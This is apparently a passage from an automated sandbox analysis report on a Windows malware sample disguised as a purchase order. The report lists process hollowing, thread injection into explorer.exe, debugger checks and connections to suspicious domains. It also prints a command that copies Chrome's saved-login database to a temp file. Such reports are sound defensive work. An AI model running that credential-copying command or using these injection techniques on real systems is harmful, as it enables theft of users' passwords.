Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A63D34 mov eax, dword ptr fs:[00000030h] 17_2_04A63D34
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h] 17_2_04A84D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h] 17_2_04A84D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A84D3B mov eax, dword ptr fs:[00000030h] 17_2_04A84D3B
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5AD30 mov eax, dword ptr fs:[00000030h] 17_2_04A5AD30
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04ADA537 mov eax, dword ptr fs:[00000030h] 17_2_04ADA537
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7C577 mov eax, dword ptr fs:[00000030h] 17_2_04A7C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7C577 mov eax, dword ptr fs:[00000030h] 17_2_04A7C577
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A93D43 mov eax, dword ptr fs:[00000030h] 17_2_04A93D43
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD3540 mov eax, dword ptr fs:[00000030h] 17_2_04AD3540
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B03D40 mov eax, dword ptr fs:[00000030h] 17_2_04B03D40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A77D50 mov eax, dword ptr fs:[00000030h] 17_2_04A77D50
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD46A7 mov eax, dword ptr fs:[00000030h] 17_2_04AD46A7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04B20EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04B20EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B20EA5 mov eax, dword ptr fs:[00000030h] 17_2_04B20EA5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEFE87 mov eax, dword ptr fs:[00000030h] 17_2_04AEFE87
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A676E2 mov eax, dword ptr fs:[00000030h] 17_2_04A676E2
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A816E0 mov ecx, dword ptr fs:[00000030h] 17_2_04A816E0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28ED6 mov eax, dword ptr fs:[00000030h] 17_2_04B28ED6
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A836CC mov eax, dword ptr fs:[00000030h] 17_2_04A836CC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A98EC7 mov eax, dword ptr fs:[00000030h] 17_2_04A98EC7
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B0FEC0 mov eax, dword ptr fs:[00000030h] 17_2_04B0FEC0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5E620 mov eax, dword ptr fs:[00000030h] 17_2_04A5E620
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B0FE3F mov eax, dword ptr fs:[00000030h] 17_2_04B0FE3F
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h] 17_2_04A5C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h] 17_2_04A5C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A5C600 mov eax, dword ptr fs:[00000030h] 17_2_04A5C600
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A88E00 mov eax, dword ptr fs:[00000030h] 17_2_04A88E00
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A61C mov eax, dword ptr fs:[00000030h] 17_2_04A8A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A61C mov eax, dword ptr fs:[00000030h] 17_2_04A8A61C
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B11608 mov eax, dword ptr fs:[00000030h] 17_2_04B11608
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6766D mov eax, dword ptr fs:[00000030h] 17_2_04A6766D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7AE73 mov eax, dword ptr fs:[00000030h] 17_2_04A7AE73
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A67E41 mov eax, dword ptr fs:[00000030h] 17_2_04A67E41
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1AE44 mov eax, dword ptr fs:[00000030h] 17_2_04B1AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B1AE44 mov eax, dword ptr fs:[00000030h] 17_2_04B1AE44
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A68794 mov eax, dword ptr fs:[00000030h] 17_2_04A68794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h] 17_2_04AD7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h] 17_2_04AD7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7794 mov eax, dword ptr fs:[00000030h] 17_2_04AD7794
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A937F5 mov eax, dword ptr fs:[00000030h] 17_2_04A937F5
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A54F2E mov eax, dword ptr fs:[00000030h] 17_2_04A54F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A54F2E mov eax, dword ptr fs:[00000030h] 17_2_04A54F2E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8E730 mov eax, dword ptr fs:[00000030h] 17_2_04A8E730
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7B73D mov eax, dword ptr fs:[00000030h] 17_2_04A7B73D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7B73D mov eax, dword ptr fs:[00000030h] 17_2_04A7B73D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A70E mov eax, dword ptr fs:[00000030h] 17_2_04A8A70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8A70E mov eax, dword ptr fs:[00000030h] 17_2_04A8A70E
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7F716 mov eax, dword ptr fs:[00000030h] 17_2_04A7F716
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEFF10 mov eax, dword ptr fs:[00000030h] 17_2_04AEFF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEFF10 mov eax, dword ptr fs:[00000030h] 17_2_04AEFF10
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2070D mov eax, dword ptr fs:[00000030h] 17_2_04B2070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B2070D mov eax, dword ptr fs:[00000030h] 17_2_04B2070D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6FF60 mov eax, dword ptr fs:[00000030h] 17_2_04A6FF60
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B28F6A mov eax, dword ptr fs:[00000030h] 17_2_04B28F6A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6EF40 mov eax, dword ptr fs:[00000030h] 17_2_04A6EF40
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A990AF mov eax, dword ptr fs:[00000030h] 17_2_04A990AF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A820A0 mov eax, dword ptr fs:[00000030h] 17_2_04A820A0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8F0BF mov ecx, dword ptr fs:[00000030h] 17_2_04A8F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8F0BF mov eax, dword ptr fs:[00000030h] 17_2_04A8F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8F0BF mov eax, dword ptr fs:[00000030h] 17_2_04A8F0BF
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A59080 mov eax, dword ptr fs:[00000030h] 17_2_04A59080
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD3884 mov eax, dword ptr fs:[00000030h] 17_2_04AD3884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD3884 mov eax, dword ptr fs:[00000030h] 17_2_04AD3884
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7B8E4 mov eax, dword ptr fs:[00000030h] 17_2_04A7B8E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7B8E4 mov eax, dword ptr fs:[00000030h] 17_2_04A7B8E4
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h] 17_2_04A540E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h] 17_2_04A540E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A540E1 mov eax, dword ptr fs:[00000030h] 17_2_04A540E1
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A558EC mov eax, dword ptr fs:[00000030h] 17_2_04A558EC
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov ecx, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AEB8D0 mov eax, dword ptr fs:[00000030h] 17_2_04AEB8D0
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A8002D mov eax, dword ptr fs:[00000030h] 17_2_04A8002D
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h] 17_2_04A6B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h] 17_2_04A6B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h] 17_2_04A6B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A6B02A mov eax, dword ptr fs:[00000030h] 17_2_04A6B02A
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h] 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h] 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h] 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04A7A830 mov eax, dword ptr fs:[00000030h] 17_2_04A7A830
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B24015 mov eax, dword ptr fs:[00000030h] 17_2_04B24015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B24015 mov eax, dword ptr fs:[00000030h] 17_2_04B24015
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h] 17_2_04AD7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h] 17_2_04AD7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04AD7016 mov eax, dword ptr fs:[00000030h] 17_2_04AD7016
Source: C:\Windows\SysWOW64\cmmon32.exe Code function: 17_2_04B12073 mov eax, dword ptr fs:[00000030h] 17_2_04B12073
Checks if the current process is being debugged
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Process queried: DebugPort Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process queried: DebugPort Jump to behavior
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Code function: 4_2_0040ACF0 LdrLoadDll, 4_2_0040ACF0
Source: C:\Users\user\Desktop\PO#12108997.exe Memory allocated: page read and write | page guard Jump to behavior

HIPS / PFW / Operating System Protection Evasion
barindex
System process connects to network (likely due to code injection or exploit)
Source: C:\Windows\explorer.exe Network Connect: 188.114.97.10 80 Jump to behavior
Source: C:\Windows\explorer.exe Domain query: www.tyz.world
Source: C:\Windows\explorer.exe Domain query: www.madurababe.net
Source: C:\Windows\explorer.exe Network Connect: 34.102.136.180 80 Jump to behavior
Sample uses process hollowing technique
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section unmapped: C:\Windows\SysWOW64\cmmon32.exe base address: B20000 Jump to behavior
Maps a DLL or memory area into another process
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Section loaded: unknown target: C:\Windows\SysWOW64\cmmon32.exe protection: execute and read and write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: read write Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write Jump to behavior
Queues an APC in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread APC queued: target process: C:\Windows\explorer.exe Jump to behavior
Modifies the context of a thread in another process (thread injection)
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Thread register set: target process: 3968 Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Thread register set: target process: 3968 Jump to behavior
Creates a process in suspended mode (likely to inject code)
Source: C:\Users\user\Desktop\PO#12108997.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\vbc.exe Jump to behavior
Source: C:\Windows\SysWOW64\cmmon32.exe Process created: C:\Windows\SysWOW64\cmd.exe /c copy "C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data" "C:\Users\user\AppData\Local\Temp\DB1" /V Jump to behavior
Source: explorer.exe, 00000005.00000000.340347852.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.308579342.0000000000688000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.273499880.0000000000688000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: ProgmanEXE^
Source: explorer.exe, 00000005.00000000.279299320.0000000005920000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.299907153.00000000080ED000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.316538894.00000000080ED000.00000004.00000001.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd
Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progman
Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: Progmanlock
Source: explorer.exe, 00000005.00000000.291781655.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.273520311.000000000069D000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000005.00000000.308634959.000000000069D000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Shell_TrayWnd4
Source: explorer.exe, 00000005.00000000.292434291.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.309262191.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000005.00000000.273862215.0000000000BE0000.00000002.00000001.00040000.00000000.sdmp Binary or memory string: WProgram Manager
Queries the volume information (name, serial number etc) of a device
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Users\user\Desktop\PO#12108997.exe VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arial.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ariali.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arialbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\arialbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ariblk.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNB.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ARIALNBI.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\bahnschrift.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibril.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrii.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrili.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibrib.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\calibriz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambria.ttc VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cambriaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candara.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candarai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candarab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\Candaraz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comic.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comici.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comicbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\comicz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consola.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolai.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolab.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\consolaz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constan.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constani.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constanb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\constanz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbel.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbeli.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbelb.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\corbelz.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\cour.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\couri.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\courbd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\courbi.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ebrima.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\ebrimabd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\framd.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADM.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\framdit.ttf VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADMIT.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAMDCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRADMCN.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAHV.TTF VolumeInformation Jump to behavior
Source: C:\Users\user\Desktop\PO#12108997.exe Queries volume information: C:\Windows\Fonts\FRAHVIT.TTF VolumeInformation Jump to behavior
